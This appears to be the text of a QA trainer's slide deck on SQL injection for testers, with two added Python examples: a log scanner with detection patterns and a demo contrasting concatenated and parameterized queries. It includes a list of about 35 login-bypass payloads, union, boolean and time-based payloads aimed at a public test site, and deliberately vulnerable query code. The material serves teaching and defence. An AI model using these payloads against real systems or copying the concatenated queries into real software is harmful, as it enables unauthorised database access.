This document discusses SQL injections and why every tester needs to know about them. It covers the different types of SQL injection: error-based, union-based, boolean-based and time-based. Examples are provided for each type. The document also discusses ways to protect against SQL injections, such as parameterized statements, input validation, and access control. It emphasizes the importance of security testing and of being aware of injection vulnerabilities.
2. ABOUT MYSELF
VLADIMIR ARUTIN
SENIOR QA at AB SOFT
ISTQB Certified Test Manager
ISTQB and QA Manual Training Instructor
Certified Coach, Public Speaker
3. OWASP TOP 10
1. INJECTION
2. BROKEN AUTHENTICATION
3. SENSITIVE DATA EXPOSURE
4. XML EXTERNAL ENTITIES (XXE)
5. BROKEN ACCESS CONTROL
6. SECURITY MISCONFIGURATION
7. CROSS-SITE SCRIPTING
8. INSECURE DESERIALIZATION
9. USING COMPONENTS WITH KNOWN VULNERABILITIES
10. INSUFFICIENT LOGGING AND MONITORING
15. SQL INJECTIONS
HOW DOES IT HAPPEN?
A web application does not validate values received from a web form, cookie, input parameter, etc., before passing them to SQL queries:
• Your code uses unsanitized data from user input in SQL statements
• A malicious user includes SQL elements in the input in a tricky way
• Your code executes these SQL elements as part of legitimate SQL statements
16. EXAMPLES
SELECT * FROM users WHERE username = 'admin'--' AND password = 'password'
SELECT * FROM users WHERE username = "" or ""="" AND password = "" or ""=""
SELECT * FROM clients WHERE clientID = 105 OR 1=1
18. SQL INJECTIONS vocabulary
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin" or 1=1 or ""="
admin" or 1=1
19. SQL Injection Types
Error-based SQL injection
• The attacker crafts the SQL injection to make the back-end display an error
• The back-end returns an error to the attacker
• The attacker uses information contained in the error to escalate the attack
• Is used to access sensitive information (database type, file names, and more)
20. SQL Injection Types
Error-based SQL injection
Example: http://testphp.vulnweb.com/listproducts.php?cat=1'
Result: The web application displays the following error in the browser:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
21. SQL Injection Types
Union-based SQL injection
• The attacker uses a UNION clause in the payload
• The SQL engine combines sensitive information with the legitimate information that the web application should display
• The web application displays the sensitive information
22. SQL Injection Types
Union-based SQL injection
Example: http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,version(),current_user()
Result: The web application displays the system version and the name of the current user:
5.1.73-0ubuntu0.10.04.1
acuart@localhost
23. SQL Injection Types
Boolean-based SQL injection
• The attacker sends many payloads that make the application return different results depending on whether a condition is TRUE or FALSE
• The attacker draws a conclusion from the web application's behavior for each payload
• Is often used to check whether any other SQL injections are possible, but it can also be used to access sensitive information
24. SQL Injection Types
Boolean-based SQL injection
Payload 1: http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1
Payload 2: http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0
Result: The application behaves differently for the two payloads. The attacker now knows that the application is vulnerable to SQL injections.
25. SQL Injection Types
Time-based SQL injection
• The attacker sends a payload that includes a time-delay command such as SLEEP, which delays the whole response
• The attacker repeats the process as many times as possible with different arguments
• Is used to guess the content of a database cell a character at a time by using different ASCII values in conjunction with a time delay
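A defender's view of the four types above: this added example (not part of the slides) scans constructed Apache-style access-log lines for the indicator patterns of each injection type and reports which parameter carried them. The IPs, hosts and log lines are made up, and the regular expressions are heuristics chosen to match the slides' example payloads.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Heuristic indicators for the four injection types described in the slides.
# They run over URL-decoded parameter values; a real deployment would tune them.
PATTERNS = {
    # stray closing quote (cat=1') or a quote followed by a comment terminator
    "error-based": re.compile(r"""['"]\s*$|['"]\s*(?:--|#|/\*)"""),
    "union-based": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    # AND 1=1 / OR '1'='1 style conditions and their FALSE twins (AND 1=0)
    "boolean-based": re.compile(r"""\b(?:and|or)\b\s*['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I),
    "time-based": re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\b", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/')

# Constructed access-log lines (Apache style); the client IPs are hypothetical.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 500 312',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /artists.php?artist=-1+UNION+SELECT+1,version(),current_user() HTTP/1.1" 200 941',
    '10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /artists.php?artist=1+AND+1%3D1 HTTP/1.1" 200 941',
    '10.0.0.5 - - [10/Oct/2023:13:55:49 +0000] "GET /artists.php?artist=1+AND+SLEEP(5) HTTP/1.1" 200 941',
    '10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /artists.php?artist=3 HTTP/1.1" 200 941',
    '10.0.0.5 - - [10/Oct/2023:13:56:10 +0000] "POST /login.php?user=admin%27--&pass=x HTTP/1.1" 302 0',
]

def classify_value(value):
    """Return the set of injection types whose indicators appear in one parameter value."""
    return {kind for kind, rx in PATTERNS.items() if rx.search(value)}

def scan_log_line(line):
    """Return (path, {param: [types]}) for one request line, or None if it cannot be parsed."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlparse(m.group(1))
    flagged = {}
    # parse_qsl undoes percent-encoding and '+', so patterns see what the database saw
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        kinds = classify_value(value)
        if kinds:
            flagged[name] = sorted(kinds)
    return url.path, flagged

def scan_log(lines):
    """Return (path, flagged-params) for every line that carries at least one indicator."""
    hits = [scan_log_line(line) for line in lines]
    return [hit for hit in hits if hit and hit[1]]

if __name__ == "__main__":
    for path, flagged in scan_log(SAMPLE_LOG):
        print(path, flagged)
```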
28. WARNING
DON'T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only
29. How can you protect yourself?
Parameterized Statements
Stored procedures
Web application firewall
Whitelist Input Validation
Escaping All User Supplied Input
Use LIMIT in SQL queries
Trust no one
Update and patch
Use appropriate privileges
Continuously monitor SQL statements from DB-connected apps
Buy better software
30. EXAMPLE OF PROTECTION
// Define which user we want to find.
String email = "user@email.com";
// Connect to the database.
Connection conn = DriverManager.getConnection(URL, USER, PASS);

// VULNERABLE: the user-supplied value is concatenated into the SQL text,
// so anything the user typed is parsed as part of the query.
Statement stmt = conn.createStatement();
String sql = "SELECT * FROM users WHERE email = '" + email + "'";
ResultSet results = stmt.executeQuery(sql);

// PROTECTED: the statement text contains only a placeholder; the driver
// sends the value separately, so it can never change the query structure.
String safeSql = "SELECT * FROM users WHERE email = ?";
PreparedStatement pstmt = conn.prepareStatement(safeSql);
pstmt.setString(1, email);
ResultSet safeResults = pstmt.executeQuery();
while (safeResults.next()) {
    // ...do something with the data returned.
}
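The same contrast as the Java snippet, as an added runnable example that is not from the slides: the concatenated queries of slide 16 beside their parameterized versions, run against an in-memory SQLite database with constructed sample rows. The numeric clients case is included because it has no quotes to escape, which is why parameterization rather than escaping is the primary defense.

```python
import sqlite3

def make_db():
    """In-memory database with constructed sample rows (not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonder")])
    conn.execute("CREATE TABLE clients (clientID INTEGER, name TEXT)")
    conn.executemany("INSERT INTO clients VALUES (?, ?)",
                     [(105, "ACME"), (106, "Globex")])
    return conn

def login_concat(conn, username, password):
    """Vulnerable: the slide's string-concatenated query; input text becomes SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]

def login_param(conn, username, password):
    """Fixed: placeholders, so the values travel apart from the SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

def client_concat(conn, client_id):
    """Vulnerable numeric case from slide 16: there are no quotes to escape,
    so escaping alone would not stop '105 OR 1=1'."""
    sql = "SELECT name FROM clients WHERE clientID = " + client_id
    return [row[0] for row in conn.execute(sql)]

def client_param(conn, client_id):
    """Fixed: the whole input is one bound value and is never parsed as SQL."""
    sql = "SELECT name FROM clients WHERE clientID = ?"
    return [row[0] for row in conn.execute(sql, (client_id,))]

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "admin'--", "wrong"))         # ['admin']
    print(login_concat(db, "nobody", "' or '1'='1"))     # ['admin', 'alice']
    print(login_param(db, "admin'--", "wrong"))          # []
    print(client_concat(db, "105 OR 1=1"))               # ['ACME', 'Globex']
    print(client_param(db, "105 OR 1=1"))                # []
```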